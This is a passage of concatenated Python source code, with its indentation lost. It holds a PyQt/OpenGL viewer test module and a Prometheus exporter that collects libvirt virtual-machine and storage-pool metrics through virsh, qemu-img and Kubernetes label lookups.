import GLViewer as glv
import PyQt5.QtCore as QtCore
class TestModule(EaselModule):
def __init__(self, argv=None):
super().__init__()
def init(self):
#print('One-time initialization before startup happens here.')
pass
def step(self):
#print('Step.')
pass
def draw(self):
#print('OpenGL drawing.')
pass
# Some code to manage the module
class TestModuleManager(glv.GLViewer):
def __init__(self):
super().__init__()
self.Module = TestModule()
# Add more modules if needed manually
self.init()
def init(self):
self.isStop = False
self.isPause = False
self.Mutex = threading.Lock()
self.FPS = 0
self.Module.init()
# Add more modules if needed manually
# Start step() thread
self.StepThread = threading.Thread(target=self.start, args=(1,))
self.StepThread.daemon = True
self.StepThread.start()
def start(self, Dummy):
while (self.isStop == False):
if (self.isPause == True):
sleep(0.001) # Prevent CPU throttling
continue
self.stepAll()
def stepAll(self):
startTime = utilities.getCurrentEpochTime()
self.Module.step()
# Add more modules if needed
endTime = utilities.getCurrentEpochTime()
ElapsedTime = (endTime - startTime)
if ElapsedTime < 1000:
sleep(0.001) # Prevent CPU throttling
ElapsedTime += 1000
self.FPS = 1e6 / (ElapsedTime)
def stop(self):
self.Mutex.acquire()
self.isStop = not self.isStop
self.Mutex.release()
if self.StepThread is not None:
self.StepThread.join()
def togglePause(self):
self.Mutex.acquire()
self.isPause = not self.isPause
self.Mutex.release()
def moduleDraw(self):
self.Module.draw()
def keyPressEvent(self, a0: QKeyEvent):
if(a0.key() == QtCore.Qt.Key_Escape):
self.stop()
super().keyPressEvent(a0)
def mousePressEvent(self, a0: QMouseEvent):
super().mousePressEvent(a0)
# Implement class-specific functionality here
def mouseReleaseEvent(self, a0: QMouseEvent):
super().mouseReleaseEvent(a0)
# Implement class-specific functionality here
def mouseMoveEvent(self, a0: QMouseEvent):
super().mouseMoveEvent(a0)
def wheelEvent(self, a0: QWheelEvent):
super().wheelEvent(a0)
|
virt_monitor_in_docker.py
|
import subprocess
import prometheus_client
import os
import sys
import operator
import time
import threading
import threadpool
from prometheus_client.core import CollectorRegistry
from prometheus_client import Gauge,start_http_server,Counter
from kubernetes import config
from json import loads, dumps
sys.path.append("..")
from utils import constants
from utils import logger
from utils.misc import singleton, get_hostname_in_lower_case, list_objects_in_kubernetes, get_field_in_kubernetes_by_index, CDaemon, list_all_disks, runCmdRaiseException, get_hostname_in_lower_case, get_field_in_kubernetes_node
LOG = '/var/log/virtmonitor.log'
logger = logger.set_logger(os.path.basename(__file__), LOG)
TOKEN = constants.KUBERNETES_TOKEN_FILE
PLURAL = constants.KUBERNETES_PLURAL_VM
VERSION = constants.KUBERNETES_API_VERSION
GROUP = constants.KUBERNETES_GROUP
PLURAL_VMP = constants.KUBERNETES_PLURAL_VMP
VERSION_VMP = constants.KUBERNETES_API_VERSION
GROUP_VMP = constants.KUBERNETES_GROUP
SHARE_FS_MOUNT_POINT = constants.KUBEVMM_SHARE_FS_MOUNT_POINT
VDISK_FS_MOUNT_POINT = constants.KUBEVMM_VDISK_FS_MOUNT_POINT
LOCAL_FS_MOUNT_POINT = constants.KUBEVMM_LOCAL_FS_MOUNT_POINT
BLOCK_FS_MOUNT_POINT = constants.KUBEVMM_BLOCK_FS_MOUNT_POINT
HOSTNAME = get_hostname_in_lower_case()
CPU_UTILIZATION = {}
LAST_TAGS = {}
LAST_RESOURCE_UTILIZATION = {}
ALL_VMS_IN_PROMETHEUS = []
thread_pool = threadpool.ThreadPool(10)
# vm_cpu_system_proc_rate = Gauge('vm_cpu_system_proc_rate', 'The CPU rate of running system processes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_cpu_usr_proc_rate = Gauge('vm_cpu_usr_proc_rate', 'The CPU rate of running user processes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_cpu_idle_rate = Gauge('vm_cpu_idle_rate', 'The CPU idle rate in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_mem_total_bytes = Gauge('vm_mem_total_bytes', 'The total memory bytes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_mem_available_bytes = Gauge('vm_mem_available_bytes', 'The available memory bytes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_mem_buffers_bytes = Gauge('vm_mem_buffers_bytes', 'The buffers memory bytes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_mem_rate = Gauge('vm_mem_rate', 'The memory rate in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_disk_read_requests_per_secend = Gauge('vm_disk_read_requests_per_secend', 'Disk read requests per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_disk_write_requests_per_secend = Gauge('vm_disk_write_requests_per_secend', 'Disk write requests per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_disk_read_bytes_per_secend = Gauge('vm_disk_read_bytes_per_secend', 'Disk read bytes per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_disk_write_bytes_per_secend = Gauge('vm_disk_write_bytes_per_secend', 'Disk write bytes per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_receive_packages_per_secend = Gauge('vm_network_receive_packages_per_secend', 'Network receive packages per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_receive_bytes_per_secend = Gauge('vm_network_receive_bytes_per_secend', 'Network receive bytes per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_receive_errors_per_secend = Gauge('vm_network_receive_errors_per_secend', 'Network receive errors per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_receive_drops_per_secend = Gauge('vm_network_receive_drops_per_secend', 'Network receive drops per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_send_packages_per_secend = Gauge('vm_network_send_packages_per_secend', 'Network send packages per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_send_bytes_per_secend = Gauge('vm_network_send_bytes_per_secend', 'Network send bytes per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_send_errors_per_secend = Gauge('vm_network_send_errors_per_secend', 'Network send errors per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_send_drops_per_secend = Gauge('vm_network_send_drops_per_secend', 'Network send drops per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# storage_pool_total_size_kilobytes = Gauge('storage_pool_total_size_kilobytes', 'Storage pool total size in kilobytes on host', \
# ['zone', 'host', 'pool', 'type'])
# storage_pool_used_size_kilobytes = Gauge('storage_pool_used_size_kilobytes', 'Storage pool used size in kilobytes on host', \
# ['zone', 'host', 'pool', 'type'])
# storage_disk_total_size_kilobytes = Gauge('storage_disk_total_size_kilobytes', 'Storage disk total size in kilobytes on host', \
# ['zone', 'host', 'pool', 'type', 'disk'])
# storage_disk_used_size_kilobytes = Gauge('storage_disk_used_size_kilobytes', 'Storage disk used size in kilobytes on host', \
# ['zone', 'host', 'pool', 'type', 'disk'])
# VMS_CACHE = []
# vm_cpu_system_proc_rate = Gauge('vm_cpu_system_proc_rate', 'The CPU rate of running system processes in virtual machine', \
# ['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
# vm_cpu_usr_proc_rate = Gauge('vm_cpu_usr_proc_rate', 'The CPU rate of running user processes in virtual machine', \
# ['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_cpu_idle_rate = Gauge('vm_cpu_idle_rate', 'The CPU idle rate in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_mem_total_bytes = Gauge('vm_mem_total_bytes', 'The total memory bytes in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_mem_available_bytes = Gauge('vm_mem_available_bytes', 'The available memory bytes in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_mem_buffers_bytes = Gauge('vm_mem_buffers_bytes', 'The buffers memory bytes in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_mem_rate = Gauge('vm_mem_rate', 'The memory rate in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_disk_read_requests_per_secend = Gauge('vm_disk_read_requests_per_secend', 'Disk read requests per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_disk_write_requests_per_secend = Gauge('vm_disk_write_requests_per_secend', 'Disk write requests per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_disk_read_bytes_per_secend = Gauge('vm_disk_read_bytes_per_secend', 'Disk read bytes per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_disk_write_bytes_per_secend = Gauge('vm_disk_write_bytes_per_secend', 'Disk write bytes per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_receive_packages_per_secend = Gauge('vm_network_receive_packages_per_secend', 'Network receive packages per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_receive_bytes_per_secend = Gauge('vm_network_receive_bytes_per_secend', 'Network receive bytes per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_receive_errors_per_secend = Gauge('vm_network_receive_errors_per_secend', 'Network receive errors per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_receive_drops_per_secend = Gauge('vm_network_receive_drops_per_secend', 'Network receive drops per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_send_packages_per_secend = Gauge('vm_network_send_packages_per_secend', 'Network send packages per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_send_bytes_per_secend = Gauge('vm_network_send_bytes_per_secend', 'Network send bytes per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_send_errors_per_secend = Gauge('vm_network_send_errors_per_secend', 'Network send errors per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_send_drops_per_secend = Gauge('vm_network_send_drops_per_secend', 'Network send drops per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
storage_pool_total_size_kilobytes = Gauge('storage_pool_total_size_kilobytes', 'Storage pool total size in kilobytes on host', \
['zone', 'host', 'pool', 'type'])
storage_pool_used_size_kilobytes = Gauge('storage_pool_used_size_kilobytes', 'Storage pool used size in kilobytes on host', \
['zone', 'host', 'pool', 'type'])
storage_disk_total_size_kilobytes = Gauge('storage_disk_total_size_kilobytes', 'Storage disk total size in kilobytes on host', \
['zone', 'host', 'pool', 'type', 'disk'])
storage_disk_used_size_kilobytes = Gauge('storage_disk_used_size_kilobytes', 'Storage disk used size in kilobytes on host', \
['zone', 'host', 'pool', 'type', 'disk'])
class KillableThread:
def __init__(self, target, args=None):
self.th = threading.Thread(target=target, args=args)
self.kill_sema = threading.Semaphore(0)
self.start_sema = threading.Semaphore(0)
def daemon_thread(self):
self.th.setDaemon(True)
self.th.start()
self.start_sema.release()
self.kill_sema.acquire()
self.guard = threading.Thread(target=daemon_thread, args=(self,))
def start(self):
self.guard.start()
self.start_sema.acquire()
def join(self, secs=None):
self.th.join(secs)
if not self.th.is_alive():
self.kill_sema.release()
def is_alive(self):
return self.th.is_alive() and self.guard.is_alive()
def kill(self):
self.kill_sema.release()
while self.guard.is_alive():
pass
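# A usage sketch for KillableThread, mirroring how collect_storage_metrics() uses it
# below: run a task with a hard time budget, then release the guard thread. The worker
# function is an illustrative stand-in.
def _example_killable_thread():
    def slow_task():
        time.sleep(5)
    t = KillableThread(target=slow_task, args=())
    t.start()
    t.join(2)   # wait at most 2 seconds for the task
    t.kill()    # release the guard whether or not the task finished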
def collect_storage_metrics(zone):
config.load_kube_config(config_file=TOKEN)
vmps = list_objects_in_kubernetes(GROUP_VMP, VERSION_VMP, PLURAL_VMP)
# storages = {VDISK_FS_MOUNT_POINT: 'vdiskfs', SHARE_FS_MOUNT_POINT: 'nfs/glusterfs', \
# LOCAL_FS_MOUNT_POINT: 'localfs', BLOCK_FS_MOUNT_POINT: 'blockfs'}
for vmp in vmps:
try:
# all_pool_storages = runCmdRaiseException('timeout 2 df -aT | grep %s | awk \'{print $3,$4,$7}\'' % mount_point)
(vmp_mount_point, vmp_type, vmp_uuid, vmp_nodename) = _get_pool_details(vmp)
if get_hostname_in_lower_case() != vmp_nodename:
continue
output = runCmdRaiseException('timeout 2 cstor-cli pool-show --poolname %s' % vmp_uuid)
if output:
vmp_utils = loads(output[0])
pool_total, pool_used = int(vmp_utils['data'].get('total'))/1024, int(vmp_utils['data'].get('used'))/1024
t = KillableThread(target=get_pool_metrics,args=(pool_total, pool_used, vmp_mount_point, vmp_type, zone,))
t.start()
t.join(2)
t.kill()
except Exception as e:
logger.warning('Oops! ', exc_info=1)
raise e
# get_pool_metrics(pool_storage, pool_type, zone)
def _get_pool_details(vm_pool):
try:
return (vm_pool['metadata'].get('name'), vm_pool['spec']['pool'].get('pooltype'),
vm_pool['spec']['pool'].get('poolname'), vm_pool['spec'].get('nodeName'))
except:
logger.warning('Oops! ', exc_info=1)
return (None, None, None, None)
def get_pool_metrics(pool_total, pool_used, pool_mount_point, pool_type, zone):
# global storage_pool_total_size_kilobytes
# global storage_pool_used_size_kilobytes
storage_pool_total_size_kilobytes.labels(zone, HOSTNAME, pool_mount_point, pool_type).set(pool_total)
storage_pool_used_size_kilobytes.labels(zone, HOSTNAME, pool_mount_point, pool_type).set(pool_used)
collect_disk_metrics(pool_mount_point, pool_type, zone)
def collect_disk_metrics(pool_mount_point, pool_type, zone):
if pool_type in ['vdiskfs', 'nfs/glusterfs', 'localfs']:
disk_list = list_all_disks(pool_mount_point, 'f')
disk_type = 'file'
else:
disk_list = list_all_disks(pool_mount_point, 'l')
disk_type = 'block'
for disk in disk_list:
get_vdisk_metrics(pool_mount_point, disk_type, disk, zone)
# t = threading.Thread(target=get_vdisk_metrics,args=(pool_mount_point, disk_type, disk, zone,))
# t.setDaemon(True)
# t.start()
# t.join()
# vdisk_fs_list = list_all_vdisks(VDISK_FS_MOUNT_POINT, 'f')
# for disk in vdisk_fs_list:
# t1 = threading.Thread(target=get_vdisk_metrics,args=(disk, zone,))
# t1.setDaemon(True)
# t1.start()
# local_fs_list = list_all_vdisks(LOCAL_FS_MOUNT_POINT, 'f')
# for disk in local_fs_list:
# t1 = threading.Thread(target=get_vdisk_metrics,args=(disk, zone,))
# t1.setDaemon(True)
# t1.start()
# resource_utilization = {'host': HOSTNAME, 'vdisk_metrics': {}}
def get_vdisk_metrics(pool_mount_point, disk_type, disk, zone):
# global storage_disk_total_size_kilobytes
# global storage_disk_used_size_kilobytes
try:
output = loads(runCmdRaiseException('timeout 2 qemu-img info -U --output json %s' % (disk), use_read=True))
# output = loads()
# print(output)
except:
output = {}
if output:
virtual_size = float(output.get('virtual-size')) / 1024 if output.get('virtual-size') else 0.00
actual_size = float(output.get('actual-size')) / 1024 if output.get('actual-size') else 0.00
storage_disk_total_size_kilobytes.labels(zone, HOSTNAME, pool_mount_point, disk_type, disk).set(virtual_size)
storage_disk_used_size_kilobytes.labels(zone, HOSTNAME, pool_mount_point, disk_type, disk).set(actual_size)
def runCmdAndGetOutput(cmd):
if not cmd:
return
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for line in std_out:
msg = msg + line
return msg
if std_err:
return ''
except Exception:
return ''
finally:
p.stdout.close()
p.stderr.close()
def get_disks_spec(domain):
output = runCmdAndGetOutput('virsh domblklist %s' % domain)
lines = output.splitlines()
specs = []
for i in range(2, len(lines)):
spec = []
kv = lines[i].split()
if len(kv) == 2:
spec.append(kv[0])
spec.append(kv[1])
specs.append(spec)
return specs
def list_active_vms():
output = runCmdAndGetOutput('virsh list')
lines = output.splitlines()
if (len(lines) < 2):
return []
vms = []
for line in lines[2:]:
if (len(line.split()) == 3):
vms.append(line.split()[1])
return vms
def list_all_vms():
output = runCmdAndGetOutput('virsh list --all')
lines = output.splitlines()
if (len(lines) < 2):
return []
vms = []
for line in lines[2:]:
if (len(line.split()) >= 2):
vms.append(line.split()[1])
return vms
def get_macs(vm):
if not vm:
return []
lines = runCmdRaiseException('timeout 2 virsh domiflist %s | awk \'NR>2{print $5}\'' % (vm))
# for child in root:
# print(child.tag, "----", child.attrib)
macs = []
for line in lines:
line = line.strip()
if line:
macs.append(line)
return macs
def collect_vm_metrics(zone):
try:
global ALL_VMS_IN_PROMETHEUS
vm_list = list_active_vms()
all_vm = list_all_vms()
vm_not_exists = []
if ALL_VMS_IN_PROMETHEUS:
vm_not_exists = list(set(ALL_VMS_IN_PROMETHEUS).difference(set(all_vm)))
ALL_VMS_IN_PROMETHEUS = all_vm
# global VMS_CACHE
vm_stopped = []
# if VMS_CACHE:
# print(all_vm)
# print(vm_list)
# print(vm_not_exists)
threads = []
if all_vm:
vm_stopped = list(set(all_vm).difference(set(vm_list)))
for vm in vm_list:
# t = threading.Thread(target=get_vm_metrics,args=(vm, zone,))
t = threadpool.makeRequests(get_vm_metrics, [((vm, zone),{})])
threads.extend(t)
for vm in vm_stopped:
# t = threading.Thread(target=zero_vm_metrics,args=(vm, zone,))
t = threadpool.makeRequests(zero_vm_metrics, [((vm, zone),{})])
threads.extend(t)
for vm in vm_not_exists:
# t = threading.Thread(target=delete_vm_metrics,args=(vm, zone,))
t = threadpool.makeRequests(delete_vm_metrics, [((vm, zone),{})])
threads.extend(t)
# for thread in threads:
# thread.setDaemon(True)
# thread.start()
list(map(thread_pool.putRequest, threads))  # force evaluation so every request is actually queued (map() is lazy on Python 3)
thread_pool.wait()
except:
logger.warning('Oops! ', exc_info=1)
return
# get_vm_metrics(vm, zone)
def get_vm_metrics(vm, zone):
try:
global LAST_TAGS
global LAST_RESOURCE_UTILIZATION
# delete_duplicated_data = False
# tags = {}
config.load_kube_config(config_file=TOKEN)
labels = get_field_in_kubernetes_by_index(vm, GROUP, VERSION, PLURAL, ['metadata', 'labels'])
this_tags = {'zone': zone, 'host': HOSTNAME, 'owner': labels.get('owner'),
"router": labels.get('router'), "autoscalinggroup": labels.get('autoscalinggroup'),
"cluster": labels.get('cluster')}
if vm in LAST_TAGS.keys() and operator.ne(LAST_TAGS[vm], this_tags):
# print("need delete")
delete_vm_metrics(vm, LAST_TAGS[vm].get('zone'))
# delete_duplicated_data = True
# tags = {'zone': LAST_TAGS[vm].get('zone'), 'host': LAST_TAGS[vm].get('host'), 'owner': LAST_TAGS[vm].get('owner'),
# "router": LAST_TAGS[vm].get('router'), "autoscalinggroup": LAST_TAGS[vm].get('autoscalinggroup'),
# "cluster": LAST_TAGS[vm].get('cluster'), 'vm': vm}
# labels_str = dumps(labels)
# if delete_duplicated_data:
LAST_TAGS[vm] = this_tags
resource_utilization = {'vm': vm, 'cpu_metrics': {}, 'mem_metrics': {},
'disks_metrics': [], 'networks_metrics': [], 'cluster': labels.get('cluster'), 'router': labels.get('router'),
'owner': labels.get('owner'), 'autoscalinggroup': labels.get('autoscalinggroup')}
# cpus = len(get_vcpus(vm)[0])
# print(cpus)
cpu_stats = runCmdRaiseException('timeout 2 virsh domstats --vcpu %s | grep time | awk \'{split($0,a,\"=\");print a[2]}\'' % vm)
cpu_time = 0.00
cpu_number = 0
for line in cpu_stats:
one_cpu_time_seconds = int(line) / 1000000000
cpu_time += one_cpu_time_seconds
cpu_number += 1
# cpu_system_time = 0.00
# cpu_user_time = 0.00
# for line in cpu_stats:
# if line.find('cpu_time') != -1:
# p1 = r'^(\s*cpu_time\s*)([\S*]+)\s*(\S*)'
# m1 = re.match(p1, line)
# if m1:
# cpu_time = float(m1.group(2))
# elif line.find('system_time') != -1:
# p1 = r'^(\s*system_time\s*)([\S*]+)\s*(\S*)'
# m1 = re.match(p1, line)
# if m1:
# cpu_system_time = float(m1.group(2))
# elif line.find('user_time') != -1:
# p1 = r'^(\s*user_time\s*)([\S*]+)\s*(\S*)'
# m1 = re.match(p1, line)
# if m1:
# cpu_user_time = float(m1.group(2))
first_time = False
cpu_util = 0.00
global CPU_UTILIZATION
# logger.debug(vm)
if vm in CPU_UTILIZATION.keys() and cpu_number == CPU_UTILIZATION[vm].get('cpu_number'):
interval = time.time() - CPU_UTILIZATION[vm].get('time')
cpu_util = (cpu_time - float(CPU_UTILIZATION[vm].get('cpu_time')))/ cpu_number / interval
# logger.debug('%.2f %.2f %.2f %.2f' % (interval, cpu_util, cpu_system_util, cpu_user_util))
# logger.debug(CPU_UTILIZATION[vm], cpu_number, cpu_time, interval)
CPU_UTILIZATION[vm] = {'cpu_time': cpu_time,
'time': time.time(), 'cpu_number': cpu_number}
else:
CPU_UTILIZATION[vm] = {'cpu_time': cpu_time, 'time': time.time(), 'cpu_number': cpu_number}
first_time = True
if not first_time:
resource_utilization['cpu_metrics']['cpu_idle_rate'] = \
'%.2f' % abs(1 - cpu_util) if abs(1 - cpu_util) <= 1.00 and abs(1 - cpu_util) >= 0.00 else 0.00
else:
resource_utilization['cpu_metrics']['cpu_idle_rate'] = '%.2f' % (1.00)
# logger.debug(resource_utilization['cpu_metrics'])
mem_stats = runCmdRaiseException('timeout 2 virsh dommemstat %s' % vm)
mem_actual = 0.00
mem_unused = 0.00
mem_available = 0.00
for line in mem_stats:
if line.find('unused') != -1:
mem_unused = float(line.split(' ')[1].strip()) * 1024
elif line.find('available') != -1:
mem_available = float(line.split(' ')[1].strip()) * 1024
elif line.find('actual') != -1:
mem_actual = float(line.split(' ')[1].strip()) * 1024
resource_utilization['mem_metrics']['mem_unused'] = '%.2f' % (mem_unused)
resource_utilization['mem_metrics']['mem_available'] = '%.2f' % (mem_available)
if mem_unused and mem_available and mem_actual:
mem_buffers = abs(mem_actual - mem_available)
resource_utilization['mem_metrics']['mem_buffers'] = '%.2f' % (mem_buffers)
resource_utilization['mem_metrics']['mem_rate'] = \
'%.2f' % (abs(mem_available - mem_unused - mem_buffers) / mem_available * 100)
else:
resource_utilization['mem_metrics']['mem_buffers'] = '%.2f' % (0.00)
resource_utilization['mem_metrics']['mem_rate'] = '%.2f' % (0.00)
disks_spec = get_disks_spec(vm)
for disk_spec in disks_spec:
disk_metrics = {}
disk_device = disk_spec[0]
disk_metrics['device'] = disk_device
stats1 = {}
stats2 = {}
# logger.debug('virsh domblkstat --device %s --domain %s' % (disk_device, vm))
blk_dev_stats1 = runCmdRaiseException('timeout 2 virsh domblkstat --device %s --domain %s' % (disk_device, vm))
t1 = time.time()
for line in blk_dev_stats1:
if line.find('rd_req') != -1:
stats1['rd_req'] = float(line.split(' ')[2].strip())
elif line.find('rd_bytes') != -1:
stats1['rd_bytes'] = float(line.split(' ')[2].strip())
elif line.find('wr_req') != -1:
stats1['wr_req'] = float(line.split(' ')[2].strip())
elif line.find('wr_bytes') != -1:
stats1['wr_bytes'] = float(line.split(' ')[2].strip())
time.sleep(0.1)
blk_dev_stats2 = runCmdRaiseException('timeout 2 virsh domblkstat --device %s --domain %s' % (disk_device, vm))
t2 = time.time()
interval = t2 - t1
for line in blk_dev_stats2:
if line.find('rd_req') != -1:
stats2['rd_req'] = float(line.split(' ')[2].strip())
elif line.find('rd_bytes') != -1:
stats2['rd_bytes'] = float(line.split(' ')[2].strip())
elif line.find('wr_req') != -1:
stats2['wr_req'] = float(line.split(' ')[2].strip())
elif line.find('wr_bytes') != -1:
stats2['wr_bytes'] = float(line.split(' ')[2].strip())
disk_metrics['disk_read_requests_per_secend'] = '%.2f' % ((stats2['rd_req'] - stats1['rd_req']) / interval) \
if (stats2['rd_req'] - stats1['rd_req']) > 0 else '%.2f' % (0.00)
disk_metrics['disk_read_bytes_per_secend'] = '%.2f' % ((stats2['rd_bytes'] - stats1['rd_bytes']) / interval) \
if (stats2['rd_bytes'] - stats1['rd_bytes']) > 0 else '%.2f' % (0.00)
disk_metrics['disk_write_requests_per_secend'] = '%.2f' % ((stats2['wr_req'] - stats1['wr_req']) / interval) \
if (stats2['wr_req'] - stats1['wr_req']) > 0 else '%.2f' % (0.00)
disk_metrics['disk_write_bytes_per_secend'] = '%.2f' % ((stats2['wr_bytes'] - stats1['wr_bytes']) / interval) \
if (stats2['wr_bytes'] - stats1['wr_bytes']) > 0 else '%.2f' % (0.00)
resource_utilization['disks_metrics'].append(disk_metrics)
macs = get_macs(vm)
for mac in macs:
# logger.debug(mac)
net_metrics = {}
net_metrics['device'] = mac.encode('utf-8')
stats1 = {}
stats2 = {}
net_dev_stats1 = runCmdRaiseException('timeout 2 virsh domifstat --interface %s --domain %s' % (mac, vm))
t1 = time.time()
for line in net_dev_stats1:
if line.find('rx_bytes') != -1:
stats1['rx_bytes'] = float(line.split(' ')[2].strip())
elif line.find('rx_packets') != -1:
stats1['rx_packets'] = float(line.split(' ')[2].strip())
elif line.find('tx_packets') != -1:
stats1['tx_packets'] = float(line.split(' ')[2].strip())
elif line.find('tx_bytes') != -1:
stats1['tx_bytes'] = float(line.split(' ')[2].strip())
elif line.find('rx_drop') != -1:
stats1['rx_drop'] = float(line.split(' ')[2].strip())
elif line.find('rx_errs') != -1:
stats1['rx_errs'] = float(line.split(' ')[2].strip())
elif line.find('tx_errs') != -1:
stats1['tx_errs'] = float(line.split(' ')[2].strip())
elif line.find('tx_drop') != -1:
stats1['tx_drop'] = float(line.split(' ')[2].strip())
# logger.debug(stats1)
time.sleep(0.1)
net_dev_stats2 = runCmdRaiseException('timeout 2 virsh domifstat --interface %s --domain %s' % (mac, vm))
t2 = time.time()
interval = t2 - t1
for line in net_dev_stats2:
if line.find('rx_bytes') != -1:
stats2['rx_bytes'] = float(line.split(' ')[2].strip())
elif line.find('rx_packets') != -1:
stats2['rx_packets'] = float(line.split(' ')[2].strip())
elif line.find('tx_packets') != -1:
stats2['tx_packets'] = float(line.split(' ')[2].strip())
elif line.find('tx_bytes') != -1:
stats2['tx_bytes'] = float(line.split(' ')[2].strip())
elif line.find('rx_drop') != -1:
stats2['rx_drop'] = float(line.split(' ')[2].strip())
elif line.find('rx_errs') != -1:
stats2['rx_errs'] = float(line.split(' ')[2].strip())
elif line.find('tx_errs') != -1:
stats2['tx_errs'] = float(line.split(' ')[2].strip())
elif line.find('tx_drop') != -1:
stats2['tx_drop'] = float(line.split(' ')[2].strip())
# logger.debug(stats2)
net_metrics['network_read_packages_per_secend'] = '%.2f' % ((stats2['rx_packets'] - stats1['rx_packets']) / interval) \
if (stats2['rx_packets'] - stats1['rx_packets']) > 0 else '%.2f' % (0.00)
net_metrics['network_read_bytes_per_secend'] = '%.2f' % ((stats2['rx_bytes'] - stats1['rx_bytes']) / interval) \
if (stats2['rx_bytes'] - stats1['rx_bytes']) > 0 else '%.2f' % (0.00)
net_metrics['network_write_packages_per_secend'] = '%.2f' % ((stats2['tx_packets'] - stats1['tx_packets']) / interval) \
if (stats2['tx_packets'] - stats1['tx_packets']) > 0 else '%.2f' % (0.00)
net_metrics['network_write_bytes_per_secend'] = '%.2f' % ((stats2['tx_bytes'] - stats1['tx_bytes']) / interval) \
if (stats2['tx_bytes'] - stats1['tx_bytes']) > 0 else '%.2f' % (0.00)
net_metrics['network_read_errors_per_secend'] = '%.2f' % ((stats2['rx_errs'] - stats1['rx_errs']) / interval) \
if (stats2['rx_errs'] - stats1['rx_errs']) > 0 else '%.2f' % (0.00)
net_metrics['network_read_drops_per_secend'] = '%.2f' % ((stats2['rx_drop'] - stats1['rx_drop']) / interval) \
if (stats2['rx_drop'] - stats1['rx_drop']) > 0 else '%.2f' % (0.00)
net_metrics['network_write_errors_per_secend'] = '%.2f' % ((stats2['tx_errs'] - stats1['tx_errs']) / interval) \
if (stats2['tx_errs'] - stats1['tx_errs']) > 0 else '%.2f' % (0.00)
net_metrics['network_write_drops_per_secend'] = '%.2f' % ((stats2['tx_drop'] - stats1['tx_drop']) / interval) \
if (stats2['tx_drop'] - stats1['tx_drop']) > 0 else '%.2f' % (0.00)
resource_utilization['networks_metrics'].append(net_metrics)
# logger.debug(net_metrics)
LAST_RESOURCE_UTILIZATION[vm] = resource_utilization
if cpu_number == CPU_UTILIZATION[vm].get('cpu_number'):
vm_cpu_idle_rate.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['cpu_metrics']['cpu_idle_rate'])
vm_mem_total_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_available'])
vm_mem_available_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_unused'])
vm_mem_buffers_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_buffers'])
vm_mem_rate.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_rate'])
for disk_metrics in resource_utilization['disks_metrics']:
